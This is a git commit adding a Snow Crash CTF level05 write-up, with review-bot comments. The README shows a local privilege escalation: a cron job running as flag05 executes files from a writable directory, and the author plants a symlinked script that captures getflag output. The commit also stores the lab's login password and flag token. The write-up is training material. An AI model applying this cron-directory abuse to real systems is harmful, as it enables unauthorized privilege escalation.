refactor(maiboyer): adding the maiboyer directory
parent db7f1343c5
commit ab55d4de10
48 changed files with 0 additions and 0 deletions
76
maiboyer/level05/README.md
Normal file
|
|
@ -0,0 +1,76 @@
|
|||
# Level 05
|
||||
|
||||
## how to login
|
||||
|
||||
username: level05
|
||||
|
||||
password: ne2searoevaevoem4ov4ar8ap
|
||||
|
||||
## Goal
|
||||
|
||||
run `getflag` as user `flag05`
|
||||
|
||||
## Actually doing something
|
||||
|
||||
```bash
|
||||
level05@snowcrash.local.maix.me's password:
|
||||
You have new mail.
|
||||
level05@SnowCrash:~$
|
||||
```
|
||||
|
||||
This is weird, the only mail I have is my chain mail !
|
||||
|
||||
Jokes aside, looking at the files in the user's home, there is nothing other than the default ones.
|
||||
|
||||
This reeks of old program though. Nobody check mails directly when they login like this.
|
||||
|
||||
From my times on wikipedia *not working* I know that `/var/mail` sometimes exists, lets check it
|
||||
|
||||
```bash
|
||||
level05@SnowCrash:~$ ll /var/mail/level05
|
||||
-rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05
|
||||
level05@SnowCrash:~$ cat /var/mail/level05
|
||||
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
|
||||
```
|
||||
|
||||
Oh wow, this looks like a nice cronjob
|
||||
|
||||
if we decipher the old text, we get something like this:
|
||||
|
||||
> Every two minutes (0, 2, 4, etc...) run the command `su -c "sh /usr/sbin/openarenaserver" - flag05`
|
||||
|
||||
so `su -c "text"` means "please run `text` as X" and the `- flag05` means "use as `flag05` and not `root` as your user"
|
||||
|
||||
so this runs `/usr/sbin/openarenaserver` every two minutes as the user `flag05`
|
||||
|
||||
lets read that script
|
||||
|
||||
```bash
|
||||
level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
|
||||
#!/bin/sh
|
||||
|
||||
for i in /opt/openarenaserver/* ; do
|
||||
(ulimit -t 5; bash -x "$i")
|
||||
rm -f "$i"
|
||||
done
|
||||
```
|
||||
|
||||
It looks like it runs the files present in `/opt/openarenaserver` with a limit of 5s (cpu time) per process, and then remove that file
|
||||
|
||||
lets try to add a little script there (like say something that dumps the output of `getflag` to elsewhere?)
|
||||
|
||||
```bash
|
||||
``level05@SnowCrash:~$ cat <<EOF >/tmp/getflag05
|
||||
> #!/bin/sh
|
||||
> getflag >/tmp/flag05
|
||||
> chmod +r /tmp/flag05
|
||||
> EOF
|
||||
level05@SnowCrash:~$ chmod a+rx /tmp/getflag05
|
||||
level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag
|
||||
level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05
|
||||
Check flag.Here is your token : viuaaale9huek52boumoomioc
|
||||
```
|
||||
|
||||
And voila !
|
||||
We had to write the result to another file since otherwise the data would be lost to the ether (crontab stdio)
|
||||
|
||||
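Review bot: The "Actually doing something" section never shows why `level05` can place a file in `/opt/openarenaserver`; the transcript goes straight from reading `/usr/sbin/openarenaserver` to `ln -s /tmp/getflag05 /opt/openarenaserver/flag`. The root cause is that a job running as `flag05` executes every file in a directory a lower-privileged user can write to, so the output of `ls -ld /opt/openarenaserver` before the symlink step would document it (and of `getfacl` if ACLs are in use there, as the `+` marker on `/var/mail/level05` suggests they are on this box). Two smaller points in the same section: the transcript line `level05@SnowCrash:~$ cat <<EOF >/tmp/getflag05` is preceded by two stray backticks, and in the `su` explanation the `-` requests a login shell while `flag05` is the target user, so the sentence treating `- flag05` as a single option should be split accordingly.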
1
maiboyer/level05/flag
Normal file
|
|
@ -0,0 +1 @@
|
|||
viuaaale9huek52boumoomioc
|
||||
1
maiboyer/level05/passwd
Normal file
|
|
@ -0,0 +1 @@
|
|||
ne2searoevaevoem4ov4ar8ap
|
||||
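Review bot: `maiboyer/level05/passwd` stores the same value that the README's "how to login" section prints on its `password:` line, so the credential now lives in two places that can drift apart. Suggest keeping it in `passwd` only and having the README point to that file; the same applies to the token in `maiboyer/level05/flag`, which the README transcript also shows.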